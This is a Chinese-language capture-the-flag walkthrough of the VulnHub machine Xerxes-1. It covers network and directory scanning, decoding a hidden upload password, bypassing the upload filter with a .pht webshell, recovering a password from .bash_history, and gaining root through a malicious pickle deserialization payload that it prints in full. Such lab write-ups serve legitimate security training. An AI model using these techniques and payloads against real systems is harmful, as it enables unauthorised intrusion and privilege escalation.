oscp——xerxes-1

0x00 目标资料 35

链接

https://www.vulnhub.com/entry/xerxes-1,58/

难度推荐 4

  • 思路 1

环境搭建

  • vmbox

0x01 信息收集

IP

 masscan 192.168.124.1/24 --ping --rate 1000000000000000000000000000000

20200227141608.png

端口

nmap -A 192.168.124.15

20200227141724.png

0x02 Web——Webshell

这里访问一下目标的页面,发现是一个默认的页面。
20200227141941.png
扫一下目录

dirb http://192.168.124.15/

20200227142406.png
这里访问一下

http://192.168.124.15/dev/

20200227142442.png
尝试上传之后,发现有密码校验
20200227144126.png
这里选择忘记密码,可以看到一个二维码
20200227144229.png
解密后发现是一个base64

bG9vayBkZWVwZXI=

20200227144300.png
这里对base64进行解码,可以看到是一个,意思就是更深入一点

look deeper

尝试使用look deeper当做密码,但是发现密码错误,所以深入进行搜索,可以看到是一串base64的值

KysrKysrWz4rKysrKysrKzwtXT4rKysrLisuLS0tLS4tLi4=

20200227144613.png
将base64进行解密,解码结果如下

++++++[>++++++++<-]>++++.+.----.-..

发现是bf编码,这里进行解码最后得到一个结果45100
20200227145044.png
拿到密码之后进行上传,发现有文件检测
20200227145236.png
这里知道Apache可以解析的后缀可以使pht,phtml,php3,这里测试之后只有pht可以使用,反弹回来一个shell
20200227150729.png
获取pty
20200227150832.png

0x03 Webshell——Usershell

这里在/home/amanpour查看了一下历史记录,发现了一个passwd相关的信息

cat .bash_history

20200227152611.png
这里运行一下

 python steqr.py -f newpassword

拿到一个密码
20200227152654.png
su 切换一下,如下图切换成功
20200227152830.png

0x04 Usershell——Usershell

查找一下suid,发现有一个notes的文件
20200227153242.png
切换到opt
20200227153337.png
看了一下Python的源码,发现是一个pickles架子啊的程序,这里利用pickles进行反序列化提权,将此内容写在文件里

cos
system
(S'/bin/sh'
tR.

使用notes进行导入

load ../../tmp/shell

20200227161305.png

已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页